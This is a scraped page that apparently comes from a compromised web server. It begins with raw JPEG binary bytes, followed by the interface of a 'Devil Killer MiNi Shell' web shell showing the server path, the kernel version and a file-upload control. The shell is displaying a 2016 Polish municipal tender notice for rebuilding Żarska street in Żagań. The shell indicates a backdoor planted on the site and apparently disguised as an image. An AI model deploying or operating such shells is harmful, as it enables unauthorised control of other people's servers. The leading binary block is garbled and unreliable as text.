JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160727/161015-N-2016.html

<p class="kh_header"><b>Żagań: PRZEBUDOWA NAWIERZCHNI ULICY ŻARSKIEJ NA ODCINKU OD ULICY MŁYNARSKIEJ DO ULICY XXX-LECIA W ŻAGANIU</b><br>
<b>Numer ogłoszenia: 161015 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA NAWIERZCHNI ULICY ŻARSKIEJ NA ODCINKU OD ULICY MŁYNARSKIEJ DO ULICY XXX-LECIA W ŻAGANIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEBUDOWA NAWIERZCHNI ULICY ŻARSKIEJ NA ODCINKU OD ULICY MŁYNARSKIEJ DO ULICY XXX-LECIA W ŻAGANIU 
w zakresie : wymiana nawierzchni z kostki granitowej na nawierzchnie asfaltową, budowa ciągu pieszego wraz ze ścieżką rowerową oraz rozbudowa kanalizacji deszczowej i wymiana oświetlenia drogowego 

3.1. OPIS  PRZEDMIOTU  ZAMÓWIENIA 

Ulica Żarska w Żaganiu jest drogą  publiczną gminną, klasy Z. Realizacja inwestycji obejmuje działki nr 1370/3, 1371,1735/1,1900, 1906/3,1374/1 i inwestycję sanitarną dodatkowo na działkach nr 1736/2.1737/2,1916,1919/1,1948/22.1648/25 (administrowanych przez Gminę Żagań o statusie miejskim oraz działkę nr 1752/1, której administratorem  jest Lubuski Zarząd Melioracji i Urządzeń Wodnych w Zielonej Górze.
Istniejąca jezdnia ulicy Żarskiej jest zniszczona, utraciła wymaganą nośność, na skutek zwiększającego się ruchu pojazdów, zwłaszcza ciężarowych. Istniejąca konstrukcja jezdni z kostki granitowej nie jest wystarczająca. Kostka granitowa jest zużyta i bardzo śliska, co powoduje zagrożenie w ruchu. Stan techniczny drogi oceniono jako zły i wymagający przebudowy. Chodniki są w złym stanie technicznym, zagrażają bezpieczeństwu i nie zapewniają wygody przechodniom. Z uwagi na wzmożony ruch uliczny pojazdów samochodowych w obu kierunkach  i występujące zagrożenie i brak komfortu jazdy rowerzystów zaplanowano budowę ścieżki rowerowej. W obrębie planowanej inwestycji brak jest odpowiedniej sieci kanalizacji deszczowej, odprowadzenie wód opadowych obecnie odbywa się  powierzchniowo. Istniejące odwodnienie nie zapewni prawidłowego odprowadzenia wód opadowych drogi po przebudowie. 
Projektowana kanalizacja deszczowa umiejscowiona będzie w pasie drogowym ulicy Żarskiej częściowo w śladzie istniejących chodników, które przewidziane są do rozbiórki, a częściowo w pasie jezdni
Przebudowa ma na celu podniesienie bezpieczeństwa i komfortu komunikacji uczestników ruchu.

Podstawowy zakres  przewidywanych  robót  obejmuje: 

Roboty branży drogowej  objęte  opracowaniem:
Przedmiotem inwestycji jest przebudowa nawierzchni ulicy Żarskiej w Żaganiu (od ulicy XXX - Lecia do ulicy Młynarskiej w kilometrażu od 0+000 m do 0+978,55 m), wraz  z sięgaczem przy 
ul. Żarskiej 3-5-7 (w kilometrażu od 0+000 m do 0+159m). Podstawowy zakres inwestycji 
w branży drogowej obejmuje:
1.	Rozbiórkę istniejącej nawierzchni z kostki kamiennej, wraz z rozbiórką podbudów, budowę  jezdni o nawierzchni bitumicznej, na podbudowie bitumicznej oraz podbudowie z kruszywa łamanego.
2.	Remont istniejących chodników obejmujący rozbiórkę zniszczonych nawierzchni i ułożenie chodnika z betonowej kostki brukowej.
3.	Budowę nawierzchni sięgacza jako ciągu pieszo-jezdnego z betonowej kostki brukowej.
4.	Budowę ścieżki rowerowej o nawierzchni asfaltowej przyległej do ciągu pieszego. 
2. Roboty  branży instalacyjnej:
Podstawowy zakres inwestycji obejmuje budowę odwodnienia w postaci kanalizacji deszczowej. Projektuje się sieć długości ok. 985 mb z rur średnicy DN/OD  500 mm o odejściach bocznych o średnicy DN/OD 400 mm i DN/OD 250mm. Na trasie sieci oraz w miejscach zmiany kierunku zaprojektowano studnie rewizyjne jako betonowe, prefabrykowane średnicy 1200mm, studzienki wpustów ulicznych z osadnikiem, średnicy DN 500 z przykanalikami  z rur PVC o średnicy DN/OD 200mm.  Wpusty uliczne należy wpiąć częściowo w istniejący system kanalizacji deszczowej i częściowo w  nowoprojektowaną sieć. Projektowany kolektor fi 500mm swój wylot będzie miał do rzeki Czerny. Celem zapewnienia prawidłowego podczyszczenia ścieków deszczowych przed wprowadzeniem do rzeki zaprojektowano separator koalescencyjny z by-passem i osadnikiem piasku.  Na wylocie, zgodnie z uzgodnieniami z LZMiUW, należy zamontować klapę zwrotną. Obudowę wylotu przewidziano z betonowego elementu prefabrykowanego.
3. Roboty branży elektrycznej
Przedmiotem robót oświetleniowych jest budowa sieci oświetlenia drogowego i oświetlenia przejść dla pieszych. Budowa polega na demontażu starych i posadowieniu nowych słupów oświetlenia drogowego o wysokości 9m  oraz dodaniu słupów oświetlenia  przejść dla pieszych o wysokości 5 m  wraz z oprawami wzdłuż ulicy Żarskiej w Żaganiu wg. projektu, oraz wykonania sieci kablowej zasilającej projektowane oprawy drogowe ze stacji transformatorowej S-8413, poprzez rozdzielnicę oświetleniową OD-413. 

3.3. Zakres   przewidywanych  robót  w szczególności obejmuje:
1 - BRANŻA DROGOWA 
1.1 Roboty przygotowawcze : 
1)	uporządkowanie terenu poprzez ścięcie drzew, krzewów i innych przeszkód roślinnych np. pnie po wycięciu drzew, 
2)	rozebranie istniejącej nawierzchni jezdni z kostki granitowej, krawężników, płyt chodnikowych, obrzeży,  znaków drogowych,
3)	wywóz kostki i krawężników granitowych  na składowisko wyznaczone przez Zamawiającego
4)	wywóz innego materiału  nadającego się do powtórnego użytku  (tj. płytki chodnikowe, kostka brukowa betonowa, oznakowanie drogowe)  na składowisko, 
5)	wywóz pozostałego gruzu z rozbiórki wraz z utylizacją,
6)	regulacja istniejących studzienek zaworów, zasuw, studzienek kanalizacyjnych, telekomunikacyjnych,
7)	wytyczenie geodezyjne trasy i punktów wysokościowych.
1.2 Roboty ziemne: 
1)	roboty ziemne poprzeczne z wbudowaniem ziemi w nasyp,
2)	usunięcie ziemi urodzajnej (humusu) gr. 10 cm,
3)	wykonanie wykopów liniowych i powierzchniowych w gruncie z profilowaniem                       i zagęszczaniem,
4)	zasypywanie wykopów i wywóz pozostałości gruntu.
1.3 Podbudowa : 
1)	korytowanie z wyprofilowaniem i zagęszczeniem podłoża,
2)	wykonanie  wzmocnienia podłoża jezdni oraz ciągu pieszo-jezdnego sięgacza poprzez stabilizację gruntu warstwą 15 cm gruntocementem  o  Rm = 2,5 MPa,
3)	wykonanie podbudowy  jezdni 20 cm  warstwy dolnej  z  kruszywa łamanego frakcji 0/31,5mm,
4)	wykonanie podbudowy ścieżek rowerowych  i chodnika z kruszywa łamanego,
5)	stabilizacja gruntu cementem chodników,  
6)	wykonanie podbudowy zasadniczej jezdni z betonu asfaltowego -  AC16P   gr. 6cm, 
7)	mechaniczne skropienie  podbudowy i warstwy wiążącej emulsją  asfaltową,
8)	wykonanie  nawierzchni pobocza i najazdów z kruszywa łamanego.
1.4 Roboty nawierzchniowe: 
1)	wykonanie nawierzchni  jezdni wiążącej  asfaltowej  - AC11W   o gr. 5 cm,
2)	wykonanie nawierzchni  jezdni ścieralnej asfaltowej  - SMA11S   o gr. 5 cm,
3)	wykonanie nawierzchni ścieżki rowerowej wiążącej asfaltowej -AC11W  gr. 5 cm,
4)	wykonanie nawierzchni ścieżki rowerowej ścieralnej  asfaltowej -AC 8S  gr. 5 cm,
5)	wykonanie nawierzchni chodnika z kostki brukowej  szarej typu Holland lub równoważnej  gr. 8cm,
6)	wykonanie  połączenia nowej nawierzchni jezdni  z istniejącą jezdnią asfaltową z zastosowaniem geo-kompozytu.
1.5 Urządzenia bezpieczeństwa ruchu : 
1)	montaż słupków i  znaków drogowych pionowych  typu  A, B, C i D,
2)	wykonanie oznakowania poziomego jezdni (linie, przejścia dla pieszych) farbami drogowymi  mechanicznie.
1.6 Elementy ulic i inne roboty : 
1)	ustawienie krawężników betonowych ulicznych z wykonaniem ław z oporem,
2)	ustawienie krawężników najazdowych i leżących  z wykonaniem ław z oporem, (na łukach  należy zastosować krawężniki systemowe z elementami łuków o promieniach właściwych dla istniejącej geometrii),
3)	ustawienie obrzeży betonowych na podsypce cementowo-piaskowej,
4)	wykonanie ławy betonowej i cokołu z pustaków, 
5)	wykonanie wysepki (strefy bezpiecznej),
6)	ścieki przykrawężnikowe,
7)	regulacje  włazów  studzienek  kanalizacyjnych  i  skrzynek  zaworów,
8)	prace  ziemne  związane  z  zagospodarowaniem  terenu  i  zieleni (min, powtórne wysadzanie krzewów(żywopłotu) w liniach krzewów rosnących przed przebudową), 
9)	sporządzenie inwentaryzacji i mapy powykonawczej.

2  - BRANŻA INSTALACYJNA : 
1)	sieci kanalizacji deszczowej - rurociągi z rur PVC o śr. 500 mm-985,30 m, 
2)	sieci kanalizacji deszczowej - rurociągi z rur PVC o śr.400 mm - 100,20 m, 
3)	sieci kanalizacji deszczowej - rurociągi z rur PVC o śr.250 mm - 10,10 m, 
4)	sieci kanalizacji deszczowej (przykanaliki) o śr.200 mm - 147,80 m, 
5)	studzienki ściekowe uliczne  o śr. 500  mm z osadnikiem (wraz z włazami i wpustami ulicznymi)-38 szt.,
6)	studzienki  rewizyjne  o śr. 1200 mm-34 szt.,
7)	wpięcie przykanalików do studzienek  (podłączenie wpustów ulicznych),
8)	montaż separatora o średnicy DN 2500 mm o przepustowości 50/500 l/s,
9)	montaż osadnika,
10)	wykonanie  odprowadzenia   z  umocowaniem  prefabrykowanego wylotu  ściekowego  z klapą zwrotną.

3 - ROBOTY  ELEKTRYCZNE : 
1) rozbiórka linii napowietrznej oświetlenia drogowego,
2) rozbiórka starych  słupów żelbetowych oświetleniowych wraz z wywozem i utylizacją,
3) wytyczenie tras linii kablowych,
4) wykopy liniowe mechaniczne i ręczne i inne roboty ziemne i fundamentowe,
5) układanie kabli i podłączenia przewodów,
6) montaż i stawianie słupów oświetleniowych - 38 szt.,
7) montaż wysięgników i opraw oświetleniowych,
8) układanie bednarki uziemiającej i uziomów szpilkowych,
9) montaż i połączenie rozdzielni oświetleniowej,
10) badania i pomiary instalacji i kompletnej linii kablowej.

4 - PRACE BUDOWALNE W POBLIŻU ISTNIEJĄCYCH SIECI PODZIEMNYCH:	
Z inwentaryzacji geodezyjnej istniejącego uzbrojenia podziemnego i naziemnego oraz ustaleń z instytucjami uzgadniającymi dokumentację projektową, wynika, że wzdłuż planowanej inwestycji lub na jej trasie występują następujące rodzaje uzbrojenia terenu: sieć energetyczna SN, nn, sieć wodociągowa, sieć kanalizacyjna, sieć gazowa, sieć telekomunikacyjna.
W ciągu projektowanej budowy zlokalizowane są urządzenia obce: sieć wodociągowa, sieć telekomunikacyjna, sieć kanalizacji sanitarnej i deszczowej, sieć gazowa, sieć ciepłownicza, sieć elektroenergetyczna.
Z uwagi na powyższe,  wszystkie  roboty budowlane należy prowadzić w szczególnie ostrożny sposób:
1.  W pobliżu i na skrzyżowaniach sieci gazowej  - w miejscu skrzyżowań z siecią ś/c PE DN 160/90/32  prace ziemne należy wykonać wyłącznie ręcznie bez użycia sprzętu mechanicznego i o terminie ich rozpoczęcia powiadomić RD Żagań z 7 dniowym wyprzedzeniem.
2.  Sieć energetyczna   - prace ziemne w pobliżu urządzeń wykonać bez użycia sprzętu  mechanicznego. Skrzyżowanie i zbliżenie projektowanych urządzeń z istniejącymi urządzeniami  energetycznymi podziemnymi  muszą być wykonywane zgodnie z normą N-SEP-E-003 oraz  N-SEP-E - 004, zachować wymagane odległości pionowe i poziome ,                    a w razie konieczności użyć rury osłonowe.
3. Telefonia Dialog sp. z o.o. - prace wzdłuż istniejącej sieci Dialog należy prowadzić po wytyczeniu jej przebiegu ze szczególną ostrożnością  bez udziału sprzętu  mechanicznego przy nadzorze przedstawiciela Telefonii Dialog sp. z o.o.
4.  Telekomunikacja Polska S.A.  - jw.
5.  ŻWi K  Żagań - wg. uzgodnień i warunków przyłączeniowych. 

3.4. Szczegółowy opis i zakres przedmiotu zamówienia zawiera projekt budowlany z załącznikami -stanowiący integralną część Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.23.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1. Zamawiający  żąda od Wykonawców wniesienia wadium.

8.2. Wadium  w wysokości 100 000.00 zł, słownie: sto tysięcy złotych i 00/100  należy wnieść przed upływem terminu składania ofert. 

8.3. Wadium należy wnieść w jednej z niżej  wymienionych  form: 
1)  pieniądzu; 
2)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-  
     kredytowej, z tym że poręczenie kasy jest zawsze  poręczeniem pieniężnym; 
3)  gwarancjach bankowych; 
4)  gwarancjach ubezpieczeniowych; 
5)  poręczeniach udzielanych przez podmioty, o których mowa w art.6b  ust.5 pkt  2 ustawy z 
     dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju  Przedsiębiorczości (Dz.U.   
     Nr 109, poz.1158, z późn.zm). 

8.4. Wadium wnoszone w  pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego nr BZ WBK S.A. I O/ Żagań 39 1090 2558 0000 0006 4000 0101   i  przechowuje się na tym rachunku. 

8.5. Wadium wniesione w pieniądzu uznaje się za wniesione w sposób prawidłowy, gdy kwota wadium zostanie zaksięgowana  na wskazanym koncie  Zamawiającego nie później, jak przed upływem terminu składania ofert. 
Kopię  dowodu wpłaty wadium  Wykonawca dołącza do oferty. 

8.6. Dokument potwierdzający wniesienie wadium  w innej formie niż w pieniądzu winien być 
złożony w oryginale (odrębnie poza ofertą)  przed terminem składania ofert.

8.7. Wykonawca, którego  oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego  postępowania.

8.8. Zamawiający zwraca  wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 

8.9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zwraca się  wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  

8.10. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który  wycofał ofertę przed upływem terminu składania ofert. 

8.11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.  

8.12. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu  Zwrócono wadium na podstawie  pkt  8.8 SIWZ, jeżeli w wyniku  rozstrzygnięcia  odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca  wnosi  wadium w terminie  określonym przez Zamawiającego.

8.13. Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w odpowiedzi na  wezwanie, o którym mowa w  art.26 ust.3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie,   nie złożył  dokumentów lub  oświadczeń o którym mowa w art. 25 ust.1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt.5 ustawy Pzp, lub informacji o tym, ze nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej

8.14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana : 
1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
     określonych w ofercie; 
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
      leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej 
     działalności lub czynności, Zamawiający nie żąda od Wykonawcy  potwierdzenia   
     posiadania uprawnień do wykonywania działalności typu koncesja, zezwolenie, licencja,
     gdyż przepisy prawa nie nakładają obowiązku posiadania  takowych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten wymóg Wykonawcę,  który w okresie ostatnich  pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy- w tym okresie :  
 - wykonał co najmniej  1 łączną  robotę budowalną  odpowiadającą swoim zakresem  i wartością robotom stanowiącym przedmiot zamówienia, polegającą  na budowie /przebudowie  drogi  o   nawierzchni z betonu asfaltowego o powierzchni nie mniejszej jak 2500 m2,  z kostki betonowej brukowej lub kamiennej o powierzchni nie mniejszej niż 1000 m2, z odwodnieniem oraz  wykonaniu sieci zewnętrznej instalacji sanitarnej o długości nie mniejszej niż 400 mb
lub : 
-  wykonał co najmniej 3 roboty - po jednej na każde wymienione zadanie - takie jak :  budowa/przebudowa  drogi  o   nawierzchni z betonu asfaltowego o powierzchni nie mniejszej jak 2500 m2;  budowa /przebudowa  drogi  o   nawierzchni z kostki betonowej brukowej lub kamiennej o powierzchni nie mniejszej niż 1000 m2, z odwodnieniem;  wykonanie  sieci zewnętrznej instalacji sanitarnej o długości nie mniejszej niż 400 mb.
Na potwierdzenie spełnienia  warunków  w zakresie wiedzy i doświadczenia  Wykonawca 
złoży wraz z ofertą dokument określony w punkcie 6.1  podpunkt 2 SIWZ  wraz z wymaganymi poświadczeniami. 
Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.     
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji obowiązany jest udowodnić Zamawiającemu iż będzie dysponował tymi  zasobami  w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  :  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania 
zamówienia, w jakim zakresie i na jaki okres oddaje  mu zasoby  oraz  składając dokumenty dotyczące tego podmiotu określone w punkcie  6.2 SIWZ.  
Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów przy realizacji zamówienia, chyba że za  nieudostępnienie zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) w zakresie dysponowania  osobami zdolnymi  do wykonania zamówienia, Zamawiający uzna za spełniającego te wymogi  tego Wykonawcę, który będzie dysponował osobami  posiadającymi uprawnienia niezbędne do wykonania zamówienia, a mianowicie:    
- uprawnienia budowlane do kierowania  robotami budowlanymi w specjalności drogowej bez ograniczeń  lub innymi uprawnieniami umożliwiającymi wykonywanie tych  samych   czynności, do wykonywania których uprawniają w aktualnym stanie prawnym  uprawnienia w w/w specjalności, oraz musi posiadać doświadczenie zawodowe na stanowisku kierownika budowy lub kierownika robót branży drogowej  lub inspektora nadzoru inwestorskiego na dwóch zadaniach obejmujących wykonanie nawierzchni min 600 m2, o wartości branży drogowej nie mniejszej niż 300 tyś. złotych brutto; 
- uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń  wodociągowych i kanalizacyjnych bez ograniczeń   lub innymi uprawnieniami umożliwiającymi wykonywanie tych  samych   czynności, do wykonywania których uprawniają w aktualnym stanie prawnym  uprawnienia w w/w specjalnościach; 
- uprawnienia budowalne  do kierowania robotami budowlanymi w specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń   lub innymi uprawnieniami umożliwiającymi wykonywanie tych  samych   czynności, do wykonywania których uprawniają w aktualnym stanie prawnym  uprawnienia w w/w specjalnościach.
Na potwierdzenie spełnienia wszystkich warunków określonych w punkcie 5.5. podpunkt 3   Wykonawca złoży wraz z ofertą   dokument   (wykaz) określony w  punkcie 6.1 podpunkt 3 SIWZ. Dokument musi zawierać  wszystkie żądane przez Zamawiającego informacje.   
Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. 
W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca może polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji obowiązany jest udowodnić    Zamawiającemu, iż będzie dysponował tymi  zasobami  w trakcie realizacji zamówienia, w    szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania zamówienia,  w jakim zakresie i na jaki okres oddaje mu zasoby  oraz składając dokumenty dotyczące tego podmiotu określone w punkcie 6.2 SIWZ. 
